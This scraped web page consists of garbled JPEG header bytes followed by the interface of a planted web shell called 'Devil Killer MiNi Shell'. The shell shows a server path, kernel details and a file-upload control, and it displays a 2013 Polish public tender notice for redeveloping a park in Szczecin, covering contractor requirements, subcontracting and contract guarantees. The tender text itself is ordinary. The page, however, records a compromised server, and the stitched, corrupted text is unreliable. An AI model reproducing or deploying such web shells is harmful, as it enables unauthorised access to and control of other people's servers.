JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131213/519766-N-2013.html

<p class="kh_header"><b>Szczecin: ZAGOSPODAROWANIE PARKU PRZY 
UL. 26 KWIETNIA - UL. TWARDOWSKIEGO 
W SZCZECINIE - CZĘŚĆ I</b><br>
<b>Numer ogłoszenia: 519766 - 2013; data zamieszczenia: 13.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych , ul. Ku Słońcu 125a, 71-080 Szczecin, woj. zachodniopomorskie, tel. 091 484 82 94, faks 091 484 80 55.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zuk.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowy zakład budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAGOSPODAROWANIE PARKU PRZY 
UL. 26 KWIETNIA - UL. TWARDOWSKIEGO 
W SZCZECINIE - CZĘŚĆ I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zagospodarowanie parku przy ul. 26 Kwietnia - 
ul. Twardowskiego w Szczecinie - część I.  
CPV:
45112710-5    Roboty w zakresie kształtowania terenów zielonych
45111200-0    Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne
	  45233161-5    Roboty budowlane w zakresie ścieżek pieszych
45316100-6    Instalowanie urządzeń oświetlenia zewnętrznego
45310000-3    Roboty instalacyjne elektryczne
45311000-0    Roboty w zakresie okablowania oraz instalacji elektrycznych
77313000-7    Usługi utrzymania parków
77211400-6    Usługi wycinania drzew
77211500-7    Usługi pielęgnacji drzew
2. Wykonawca zobowiązany będzie do wykonania przedmiotu zamówienia opisanego 
w załącznikach nr 9 i 10 do SIWZ. Zakres rzeczowy przedmiotu zamówienia obejmuje:
1) 		wykonanie części I etapu określonego w dokumentacji projektowej, czyli m. in.:
	a)	budowa dwóch głównych ciągów komunikacyjnych,
	b)	montaż elementów małej architektury,
	c)	gospodarka drzewostanem,
	d)	budowa nowej linii kablowej oświetlenia,
	e)	montaż lamp parkowych,
2)	wykonanie części II etapu określonego w dokumentacji projektowej, czyli m. in.:
	a)	  budowa alejek (tylko w zakresie nawierzchni z płytki betonowej).
	b)	budowa nowej linii kablowej oświetlenia,
	c)	montaż lamp parkowych.
3.	Wykonawca zobowiązany będzie - na własny koszt i we własnym zakresie - również 
m. in. do:
1)	organizacji placu budowy oraz  organizacji zaplecza socjalnego,
	2)		zabezpieczenia własnego mienia na terenie robót,
	3)		zapewnienia bezpiecznych warunków realizacji robót, określonych przepisami p.poż. 
i bhp oraz przepisami dot. ochrony środowiska,
	4)	uporządkowania terenu po zakończeniu prac,
	5)	zapewnienia obsługi geodezyjnej,
	6)		wykonania dokumentacji powykonawczej - w 1 egz.
4.   Zamawiający zobowiązuje się:
1)	przekazać protokolarnie Wykonawcy plac budowy w terminie nie dłuższym niż 
10 dni roboczych od dnia zawarcia umowy,
2)	dokonać odbioru wykonanych prac,
3)	zapewnić zapłatę wynagrodzenia za wykonane prace.
5. 	Wykonawca będzie zobowiązany do zakupu od Zamawiającego drewna, które pozyska 
w związku z realizacją przedmiotu zamówienia. W ofercie cenowej Wykonawca nie uwzględnia ceny za zakup drewna. Kwota, która będzie wynikała z faktury wystawionej przez Zamawiającego za sprzedaż drewna (kwota zostanie ustalona w oparciu o szacunek brakarski stanowiący załącznik nr 12 do SIWZ), zostanie potracona z faktury wystawionej przez Wykonawcę za realizację przedmiotu zamówienia. 
6.  Podwykonawcy:
	1)	Wykonawca może wykonać przedmiot umowy przy udziale podwykonawców 
w rozumieniu art. 6471 k.c., zawierając z nimi stosowne umowy w formie pisemnej pod rygorem nieważności.
	2)	Zawarcie umowy z podwykonawcą wymaga zgody Zamawiającego przed jej zawarciem.
	3)	Umowa z podwykonawcą musi zawierać:
		     a)  zakres rzeczowo - finansowy powierzony podwykonawcy,
	     b)  kwotę wynagrodzenia podwykonawcy,
	     c)  termin wykonania prac.
	4)	Wszelkie zmiany umów wymagają formy pisemnej i zgody Zamawiającego, pod rygorem nieważności.
	5)	Zamawiający nie wyraża zgody na zawieranie umów przez podwykonawców 
z dalszym podwykonawcą.

	6)	Zabezpieczenie ewentualnych roszczeń podwykonawców wobec Wykonawcy 
i Zamawiającego z tytułu zawarcia umowy, będzie potrącone z faktury Wykonawcy 
i zatrzymane na koncie Zamawiającego do czasu wypłaty przez Wykonawcę wynagrodzenia należnego podwykonawcy.
	7)	Zwrot zabezpieczenia nastąpi z chwilą udokumentowania przez podwykonawcę otrzymania wynagrodzenia zgodnie z umową, przekazanego Zamawiającemu 
w formie jego oświadczenia.
	8)	Niezależnie od uprawnień opisanych powyżej Zamawiający zastrzega sobie prawo dokonania zapłaty wynagrodzenia należnego podwykonawcy bezpośrednio na jego rachunek, na co Wykonawca wyraża zgodę.
	9)	Wykonawca zobowiązany jest na żądanie Zamawiającego udzielić mu wszelkich informacji dotyczących podwykonawców.
     10)	Wykonawca ponosi wobec Zamawiającego pełną odpowiedzialność za roboty, które wykonuje przy pomocy podwykonawców, jak za działania własne.
     11)	Zapisy pkt 6), 7) i 8) powyżej nie znajdą zastosowania, o ile Wykonawca wraz 
z fakturą za wykonane roboty dostarczy Zamawiającemu oświadczenie Podwykonawców o zapłacie na jego rzecz wierzytelności z tytułu robót zrealizowanych przez Podwykonawców.
7. Wykonawca wykona przedmiot zamówienia na zasadzie zapewnienia najwyższej jakości prac, zgodnie z zasadami współczesnej wiedzy technicznej, obowiązującymi normami, przepisami prawa powszechnie obowiązującego, w tym m. in. ustawą z dnia 14 grudnia 2012 r. o odpadach (Dz.U. z 2013 r. poz. 21), a także ze SIWZ i z ofertą, które będą stanowiły integralną część umowy.
8.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w stosunku do treści oferty polegających na:
1) 	zmianie przedmiotu umowy spowodowanej wprowadzeniem zmian do dokumentacji projektowej,
2)	zmianie terminu realizacji,
3)	zmianie wynagrodzenia.
9.	Zmiany w umowie będą możliwe na warunkach opisanych poniżej: 
1)	wystąpi konieczność wykonania zamówienia dodatkowego, którego realizacja będzie miała wpływ na termin realizacji robót podstawowych. W takim przypadku 
na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin wykonania przedmiotu zamówienia, co zostanie potwierdzone aneksem do umowy,
2)	w trakcie wykonywania robót wystąpią nieprzewidziane warunki realizacji i będzie 
to miało wpływ na termin realizacji robót. W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin wykonania przedmiotu zamówienia, co zostanie potwierdzone aneksem do umowy,
3)	w trakcie wykonywania przedmiotu zamówienia wystąpią przeszkody o obiektywnym charakterze, w tym: klęski żywiołowe, warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, warunki pogodowe uniemożliwiające, ze względów technologicznych, prowadzenie robót - pomimo dołożenia przez Wykonawcę wszelkich starań, aby roboty mogły zostać zrealizowane. W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin wykonania przedmiotu zamówienia, co zostanie potwierdzone aneksem do umowy. 
4)	ulegnie zmianie urzędowa stawka należnych podatków i opłat, w szczególności zmiana stawki podatku VAT. W takim przypadku na wniosek Wykonawcy lub Zamawiającego zmiana wynagrodzenia zostanie wprowadzona aneksem do umowy,
5)	w przypadku zmiany sposobu przeprowadzenia prac, np. z powodu możliwości zastosowania innej, korzystniejszej ekonomicznie technologii niż ta, która była przewidziana do dnia składania ofert. W takim przypadku na wniosek Wykonawcy lub Zamawiającego, zmiana zostanie wprowadzona aneksem do umowy,
6)	w przypadku innej okoliczności prawnej, ekonomicznej lub technicznej skutkującej niemożliwością wykonania lub nienależytym wykonaniem umowy zgodnie z SIWZ. W takim przypadku na wniosek Wykonawcy lub Zamawiającego, zmiana zostanie wprowadzona aneksem do umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.10-5, 45.11.12.00-0, 45.23.31.61-5, 45.31.61.00-6, 45.31.00.00-3, 45.31.10.00-0, 77.31.30.00-7, 77.21.14.00-6, 77.21.15.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał należycie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  dwie najważniejsze roboty budowlane, mianowicie:
a)	za jedną najważniejszą robotę budowlaną Zamawiający uzna pracę polegającą 
na zagospodarowaniu terenu obejmującą co najmniej wykonanie nawierzchni 
z płytki betonowej i cięcia pielęgnacyjne w drzewostanie, o wartości nie mniejszej niż 100 000,00 zł brutto,
oraz
b)	za drugą najważniejszą robotę budowlaną Zamawiający uzna pracę polegającą 
na budowie oświetlenia zewnętrznego, o wartości nie mniejszej niż 100 000,00 zł brutto.

Uwaga! Zamawiający uzna powyższy warunek za spełniony jeżeli wykonawca wykaże wykonanie powyższych prac w jednym lub osobnych zadaniach.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, dysponuje lub będzie dysponować co najmniej: 
a)	kierownikiem budowy - osobą posiadającą:
-	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności   konstrukcyjno-budowlanej
Zgodnie z art. 104 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. 
z 2010 r. Nr 243 poz. 1623 ze zmianami) osoby, które przed dniem wejścia 
w życie ustawy uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych 
w budownictwie, zachowują uprawnienia do pełnienia tych funkcji 
w dotychczasowym zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu i w oparciu o przepisy będące podstawą ich nadania. 
Ponadto, zgodnie z art. 12a ustawy Prawo budowlane, samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.
oraz
b)	trzema osobami do pielęgnacji drzew ozdobnych - osobami posiadającymi:
-	uprawnienia dot. pielęgnacji drzew ozdobnych i minimum 3-letnią praktykę 
w zakresie cięć pielęgnacyjnych drzew ozdobnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że zdolność kredytowa wykonawcy lub wysokość posiadanych środków nie jest niższa niż 400 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto wykonawcy mają dołączyć do oferty następujące dokumenty:
      1)  ofertę cenową - zgodnie z rozdziałem I pkt 3 SIWZ;
	W przypadku składania oferty wspólnej należy złożyć jedną ofertę cenową;
2)	odpowiednie pełnomocnictwa;
	Tylko w sytuacjach określonych w rozdziale I pkt 5 zdanie drugie SIWZ lub 
	w przypadku składania oferty wspólnej (rozdział III pkt 1 SIWZ); 
3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do SIWZ, wskazujące część zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców);
            W przypadku składania oferty wspólnej należy złożyć jedno oświadczenie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w stosunku do treści oferty polegających na:
1) 	zmianie przedmiotu umowy spowodowanej wprowadzeniem zmian do dokumentacji projektowej,
2)	zmianie terminu realizacji,
3)	zmianie wynagrodzenia.
2.	Zmiany w umowie będą możliwe na warunkach opisanych poniżej: 
1)	wystąpi konieczność wykonania zamówienia dodatkowego, którego realizacja będzie miała wpływ na termin realizacji robót podstawowych. W takim przypadku 
na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin wykonania przedmiotu zamówienia, co zostanie potwierdzone aneksem do umowy,
2)	w trakcie wykonywania robót wystąpią nieprzewidziane warunki realizacji i będzie 
to miało wpływ na termin realizacji robót. W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin wykonania przedmiotu zamówienia, co zostanie potwierdzone aneksem do umowy,
3)	w trakcie wykonywania przedmiotu zamówienia wystąpią przeszkody o obiektywnym charakterze, w tym: klęski żywiołowe, warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, warunki pogodowe uniemożliwiające, ze względów technologicznych, prowadzenie robót - pomimo dołożenia przez Wykonawcę wszelkich starań, aby roboty mogły zostać zrealizowane. W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin wykonania przedmiotu zamówienia, co zostanie potwierdzone aneksem do umowy. 
4)	ulegnie zmianie urzędowa stawka należnych podatków i opłat, w szczególności zmiana stawki podatku VAT. W takim przypadku na wniosek Wykonawcy lub Zamawiającego zmiana wynagrodzenia zostanie wprowadzona aneksem do umowy,
5)	w przypadku zmiany sposobu przeprowadzenia prac, np. z powodu możliwości zastosowania innej, korzystniejszej ekonomicznie technologii niż ta, która była przewidziana do dnia składania ofert. W takim przypadku na wniosek Wykonawcy lub Zamawiającego, zmiana zostanie wprowadzona aneksem do umowy,
6)	w przypadku innej okoliczności prawnej, ekonomicznej lub technicznej skutkującej niemożliwością wykonania lub nienależytym wykonaniem umowy zgodnie z SIWZ. W takim przypadku na wniosek Wykonawcy lub Zamawiającego, zmiana zostanie wprowadzona aneksem do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zuk.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego - 71-080 Szczecin, ul. Ku Słońcu 125A; pok. 17-18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2013 godzina 10:00, miejsce: Siedziba Zamawiającego - 71-080 Szczecin, ul. Ku Słońcu 125A; sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zadanie nie dotyczy umowy ramowej.
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Ponadto Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać dokumentów dotyczących w szczególności:
1)	zakresu dostępnych Wykonawcy zasobów innego podmiotu,
2)	sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
3)	charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
4)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
3. Jeżeli wykonawca wykazując spełnianie warunku, o którym mowa w art. 22 ust. 1 pkt 4 ustawy, polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, wymaga się przedłożenia informacji, o której mowa w pkt 4 ppkt 5 rozdziału V SIWZ, dotyczącej tych podmiotów. 
4. W przypadku, gdy jakakolwiek wartość dotycząca warunków udziału w postępowaniu została wyrażona 
w walucie obcej, Zamawiający przeliczy tą wartość w oparciu o średni kurs walut NBP dla danej waluty z daty wszczęcia postępowania o udzielenie zamówienia publicznego (datą wszczęcia postępowania jest data zamieszczenia ogłoszenia o zamówieniu w miejscu publicznie dostępnym w siedzibie Zamawiającego oraz na stronie internetowej). Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP, Zamawiający przyjmie kurs średni z ostatniej tabeli przed wszczęciem postępowania.
5. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie SPEŁNIA/NIE SPEŁNIA.
6. Wykonawca udzieli gwarancji i rękojmi na wykonany przedmiot zamówienia na okres 36 miesięcy, licząc od dnia odbioru przedmiotu zamówienia.
W przypadku, gdy gwarancja producenta na zastosowane urządzenia i materiały przekracza 36 miesięcy, wówczas Wykonawca przekaże Zamawiającemu - wraz 
z dokumentacją odbiorową - dokumenty pozwalające na skorzystanie z uprawnień wynikających z gwarancji producenta.
7. Przed podpisaniem umowy, Wykonawca przedłoży Zamawiającemu:
1)	dowód wniesienia zabezpieczenia należytego wykonania umowy:
a)		Wykonawca, zobowiązany jest wnieść zabezpieczenie należytego wykonania umowy, w wysokości 10 % ceny całkowitej zawartej w ofercie,
b)		zabezpieczenie należytego wykonania umowy będzie służyło pokryciu roszczeń 
z tytułu niewykonania lub nienależytego wykonania umowy,
c)	zabezpieczenie należytego wykonania umowy może być wniesione w: pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości,
d)	jeżeli zabezpieczenie należytego wykonania umowy zostanie wniesione 
w pieniądzu zamawiający przechowa je na oprocentowanym rachunku bankowym,
e)	jeżeli zabezpieczenie należytego wykonania umowy zostanie wniesione 
w pieniądzu, zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane pomniejszonym 
o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy 
na rachunek wykonawcy,
f)	zabezpieczenie może być wniesione w jednej lub kilku formach.
g)	w przypadku, gdy wykonawca wnosi zabezpieczenie w formie gwarancji bankowej lub gwarancji ubezpieczeniowej, z treści tych gwarancji musi 
w szczególności jednoznacznie wynikać:
A.	zobowiązanie gwaranta (banku, zakładu ubezpieczeń) do zapłaty do wysokości określonej w gwarancji kwoty, nieodwołalnie i bezwarunkowo, na pierwsze żądanie Zamawiającego zawierające oświadczenie (podpisane przez osoby upoważnione do składania oświadczeń woli w imieniu Beneficjenta), 
że zaistniały okoliczności związane z realizacją roszczenia Zamawiającego 
